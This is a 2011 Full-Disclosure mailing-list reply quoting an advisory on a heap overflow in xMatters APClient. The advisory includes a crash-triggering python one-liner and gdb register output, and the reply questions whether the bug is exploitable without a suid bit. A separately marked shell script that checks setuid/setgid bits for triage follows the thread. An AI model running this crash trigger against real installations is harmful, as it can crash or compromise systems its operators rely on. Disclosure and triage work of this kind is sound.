Message-ID: <BANLkTinGOBDQiAHT4OQWF66TC7g-suTn0g@mail.gmail.com>
Date: Thu, 28 Apr 2011 14:40:22 -0300
From: Mario Vilas <mvilas@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...
On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco <jsacco@...ecurityresearch.com> wrote:
> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software
> components and software APIs designed to provide a flexible and
> powerful set of tools for integrating various applications to
> AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in
> version APClient 3.2.0 (native)
>
> A heap overflow condition is a buffer overflow, where the buffer that
> can be overwritten is allocated in the heap portion of memory, generally
> meaning that the buffer was allocated using a routine such as the POSIX
> malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
>
> Exploit as follows:
> Submit a malicious file containing the exploit
> root@...gateway:/opt/alarmpointsystems/integrationagent/bin$
> ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program:
> /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
> 'print "\x90"*16287'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax 0xa303924 170932516
> ecx 0xbfb8 49080
> edx 0xa303924 170932516
> ebx 0x8059438 134583352
> esp 0xbfff3620 0xbfff3620
> ebp 0xbfff3638 0xbfff3638
> esi 0x8059440 134583360
> edi 0x80653f0 134632432
> eip 0x804be8a 0x804be8a <free+126>
> eflags 0x210206 [ PF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
> (gdb)
>
>
> Solution
> -------------------
> No patch is available at this time.
>
> Credits
> -------------------
> Manually discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released, stay tuned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
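The question raised in the reply above comes down to a privilege boundary: a crash driven by argv or by a caller-supplied file only matters to an attacker if the process runs as someone other than the user who launched it, which for a local binary usually means the setuid or setgid bit. The following POSIX shell check is an added example for triaging such a report; it is not part of the original thread and not code from the advisory or from xMatters. It uses a constructed dummy file as a stand-in for the binary, and the path name is an assumption.

```shell
#!/bin/sh
# Added example: classify whether a locally reachable crash in a binary
# crosses a privilege boundary. Not from the advisory or the vendor.

# privilege_boundary PATH -> prints "setuid", "setgid", "none" or "missing".
# POSIX test(1) provides -u (setuid bit) and -g (setgid bit) directly.
privilege_boundary() {
    path=$1
    [ -e "$path" ] || { echo missing; return 1; }
    if [ -u "$path" ]; then
        echo setuid
    elif [ -g "$path" ]; then
        echo setgid
    else
        echo none
    fi
}

# exploitability_note PATH -> one-line verdict suitable for a triage ticket.
# The owner is taken from ls(1) output to stay portable across stat(1) flavours.
exploitability_note() {
    path=$1
    owner=$(ls -ld "$path" 2>/dev/null | awk '{print $3}')
    case $(privilege_boundary "$path") in
        setuid)  echo "setuid $owner: input reaching the bug runs as $owner; treat as privilege escalation" ;;
        setgid)  echo "setgid: the process gains the file's group; treat as escalation to that group" ;;
        none)    echo "no suid/sgid bit: an argv- or file-driven crash stays with the invoking user (local DoS at most)" ;;
        *)       echo "cannot assess: $path is missing" ;;
    esac
}

# Self-contained demo on a constructed dummy file (a stand-in for the binary,
# not the real APClient.bin). Shows the verdict flipping when the bit is set.
demo() {
    dir=$(mktemp -d) || return 1
    bin="$dir/APClient.bin"     # constructed path, assumption only
    printf '#!/bin/sh\nexit 0\n' > "$bin"
    chmod 755 "$bin"
    echo "before:         $(exploitability_note "$bin")"
    chmod u+s "$bin"
    echo "after chmod u+s: $(exploitability_note "$bin")"
    rm -rf "$dir"
}

demo
```

Run it against the real installation path instead of the dummy file to answer the reply's question for that host. Note that a binary without these bits can still sit on a boundary if its input file is written by a less trusted principal (for example a spool directory fed by another service); the check above covers the common case the reply asks about, not that one.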